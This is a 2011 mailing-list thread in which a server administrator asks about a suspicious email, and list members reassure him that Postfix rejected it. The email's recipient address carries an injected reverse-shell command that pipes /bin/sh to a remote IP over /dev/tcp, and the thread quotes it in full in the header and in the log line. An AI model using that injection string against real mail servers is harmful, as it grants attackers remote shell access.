No worries,

Reading about attempted exploits like this is often helpful for people, as it shows them that there is a very real threat out there to servers that are not up to date. I also find it interesting to see what they get up to these days...

Daniel

On 11 February 2011 11:13, Alastair Sherringham <sherringham@gmail.com> wrote:
Thanks. All seems OK as far as I can see (AIDE check etc.) and I am up
to date with security. I like to put this sort of thing in the open
and ask, at least if it's "unusual" (to me). Thanks for the follow-up.


On 11 February 2011 11:07, Daniel Case <danielcase10@gmail.com> wrote:
> It seems the user was trying to get a shell delivered to there TCP stream. I
> have heard of an exploit like this, it was plugged quite quickly though so
> as long as you are up to date you should be fine.
> By the looks of it postfix blocked it as an illegal address so I wouldn't
> worry too much, it will have delivered it as a normal email :)
> Daniel
>
> On 11 February 2011 09:29, Alastair Sherringham <sherringham@gmail.com>
> wrote:
>>
>> I received an interesting email today. I only noticed because I had
>> logged in SSH and got the "you have new email" message. Reading via
>> "mail", I see :
>>
>> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295
>> 1>&0 2>&0"@calliope.bitfolk
>>
>> Obviously some sort of possible exploit. The IP address 87.106.250.176
>> is Germany (1&1 Internet).
>>
>> Postfix reported :
>>
>> warning: 36FE51381A3: address with illegal extension: root+:|exec
>> /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
>>
>> But it was delivered. I hope nothing bad has happened. I am running
>> AIDE as we speak and digging around).
>>
>> Cheers,
>>
>>
>> --
>> Alastair Sherringham
>> http://www.sherringham.net
>>
>> _______________________________________________
>> users mailing list
>> users@lists.bitfolk.com
>> https://lists.bitfolk.com/mailman/listinfo/users
>
>



--
Alastair Sherringham
http://www.sherringham.net